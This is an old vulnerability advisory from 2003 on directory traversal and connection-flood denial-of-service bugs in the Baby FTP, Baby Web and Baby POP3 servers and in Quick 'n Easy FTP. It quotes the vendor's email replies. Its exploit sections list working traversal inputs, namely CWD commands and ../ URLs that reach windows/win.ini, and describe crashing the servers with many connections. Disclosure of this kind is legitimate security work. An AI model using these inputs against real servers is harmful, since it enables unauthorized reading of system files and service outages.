Baby FTP server version 1.2 allows for a directory traversal attack that lets a remote attacker view any file on the system by using non-standard characters with CWD. The server will also crash if multiple connections from the same host occur.
f2693ad95d364c41a545acb6d6743c838069082815811187534c4de54b7b073d
In this advisorie there are some vulnerabilities i found yesterday for BabyFtp server,Baby web server,Baby Pop3
server and Quick n' easy Ftp.
I informed the Company about these vulnerabilities and here are the e-mails they sent me:
-----------------------------------------------------------------
From pablovandermeer@kabelfoon.nl Wed May 28 21 : 42:08 2003
Return-Path : <pablovandermeer@kabelfoon.nl>
Received : from cardassian.kabelfoon.nl (cardassian.kabelfoon.nl [62.45.45.18]) by localhost.localdomain (8.12.8/8.12.8) with ESMTP id h4SIg6KH025510 for <dr_insane@pathfinder.gr>; Wed, 28 May 2003 21:42:07 +0300
Received : from PABLO (kf-nawij-tg01-0881.dial.kabelfoon.nl [62.45.131.114]) by cardassian.kabelfoon.nl (Postfix) with SMTP id EFAF8BE9F0 for <dr_insane@pathfinder.gr>; Wed, 28 May 2003 20:39:21 +0200 (CEST)
Message-ID : <000f01c32548$73cf3be0$0100a8c0@PABLO>
From : "Pablo" <pablovandermeer@kabelfoon.nl>
To : xxxxxx xxxxxxx <dr_insane@pathfinder.gr>
References : <200305281812.h4SICUvC016027@localhost.localdomain>
ÈÝìá : Re: Multiple Vulnerabilities Found :)
Date : Wed, 28 May 2003 20:39:20 +0200
MIME-Version : 1.0
Content-Type : text/plain; charset="iso-8859-7"
Content-Transfer-Encoding : 8bit
X-Priority : 3
X-MSMail-Priority : Normal
X-Mailer : Microsoft Outlook Express 6.00.2800.1106
Disposition-Notification-To : "Pablo" <pablovandermeer@kabelfoon.nl>
X-MimeOLE : Produced By Microsoft MimeOLE V6.00.2800.1106
Hi,
Thanks you very much for your report.
First let me say that BabyFtp server, Baby web server, Baby Pop3 server are
NOT real products but just (MFC) sample applications!
They contain even more bugs than you can think of...
As for Quick 'n Easy FTP server: can you make more connections than
configured in 'Max connections' settings?
If so how did you manage to do that?
Regards,
Pablo
Ok, thanks!
It looks like this is related to the size of physical memory, when new
sockets are created in virtual memory it will crash the application... :(
I will take a look at it first thing tomorrow morning.
Regards and keep on hacking...
Pablo
------------------------------------------
Baby FTP 1.2 Multiple Vulnerabilities.
-------------------------------------------
Release Date:
MAY 28, 2003
Systems Affected:
BAby Ftp server Version 1.2
Description:
While i was testing Baby Ftp Server last night i found some vulnerabilities. Let's take a look at the following:
1)The ftp server is vulnerable to directory traversal attack. A remote user can see the whole hard disk
by supplying some strange cwd commands.
2)There is also a DOS attack.if you try to establish multiple connections from the same host on baby Ftp server it will crash.
Let's Dance (Exploit)
--------------------
(1)
You need to supply these CWD commands for a succesful attack:
CWD ...
CWD /...
CWD /......
CWD \...
CWD ...\
CWD .../
(2)
Let's try to establish about 100 connections with the webserver from the same IP:
1 220 Welcome to Baby Ftp server
2 220 Welcome to Baby Ftp server
3 220 Welcome to Baby Ftp server
.
.
.
.
67 220 Welcome to Baby Ftp server
b00m..crash:>
The error message will be: "Unhanled exception(MFC42.DLL):0xC00000005:Access Violation
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Quick n' easy FTP server 1.7 DOS ATTACK
---------------------------------------
Systems Affected:
Quick n' easy FTP server 1.7
Description:
------------
There is one D0s attack (yes again!) in Quick n' easy FTP server 1.7. By making a big numer of connections you can crash the
server:>
Exploit:
--------
The same as above...try to establish a big number of connections using the same Ip and the server will crash.
BABY web server 1.5 Multiple bugs
---------------------------------------
Systems Affected:
BAby Web server 1.5
Description:
------------
While i was checking Baby web server version 1.5 i found some stupid bugs.The first is a directory traversal bug and the second
a Dos attack.Let's find out what is going on!
Exploit:
--------
(1)You can read whatever you want on the remote server by supplying some /.././ on you Web browser:
https://[server]/../../../../windows/win.ini
https://[server]\..\..\..\windows/win.ini
etc..etc..etc...
(2)
By supplying again a very big number of connections the web server will crash:) It seems that all the products of
www.pablovandermeer.nl have the same problem.
BABY Pop3 server Version 1.0 DOS attack
---------------------------------------
Systems Affected:
BABY Pop3 server version 1.0
Description:
------------
There is the same Dos vulnerability here:P You can crash the server by supplying multiple connections from the same host.
-----------------------------------------------
vulnerabilities found and tested by dr_insane
-----------------------------------------------
Feedback
---------
Please send suggestions and Comments to:
dr_insane@hack.gr
https://members.lycos.co.uk/r34ct/